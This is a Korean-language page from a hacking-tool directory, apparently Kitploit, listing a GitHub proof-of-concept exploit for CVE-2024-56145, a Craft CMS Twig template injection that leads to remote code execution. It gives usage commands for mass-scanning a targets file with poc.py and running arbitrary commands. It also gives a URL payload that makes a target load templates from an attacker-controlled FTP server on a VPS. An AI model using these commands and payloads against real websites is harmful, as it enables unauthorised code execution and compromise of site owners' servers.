Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-56145-craftcms-rce — CVE-2024-56145 SSTI에서 RCE로 - twig 템플릿 | Kitploit
도구/GitHubGitHub/sachinart/cve-2024-56145-craftcms-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsachinart/cve-2024-56145-craftcms-rce

CVE-2024-56145-craftcms-rce

CVE-2024-56145 SSTI에서 RCE로 - twig 템플릿

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
431년 전아직 검토되지 않음

스크립트를 다시 실행하기 전에 다음을 수행하세요:

fuser -k 6666/tcp

사용법 -

python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200

사용자 정의 명령어는 다음과 같이 사용할 수 있습니다: python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"

-i는 당신의 IP 또는 VPS IP입니다 (ipconfig / ifconfig를 통해 확인).

예시: python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200

수동 익스플로잇 - 위의 poc.py를 대상에 대해 실행하면 취약한 대상 목록이 포함된 출력 파일이 생성됩니다.

이제 무엇을 할까요? 취약한 대상은 찾았지만 더 다루고 싶으신가요? 그래서 poc2.py를 추가했습니다. 이는 대상에 대한 수동 테스트를 위한 것입니다. 사용 방법은 다음과 같습니다:

다음을 실행합니다: fuser -k 6666/tcp

  1. poc2.py를 실행합니다 (포트 6666이 FTP로 시작됨).
  2. 브라우저에서 yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/ 를 엽니다.
  3. 다음과 같은 화면이 나타납니다:

image

작성자: Chirag Artani (https://x.com/Chirag99Artani)

도구 다운로드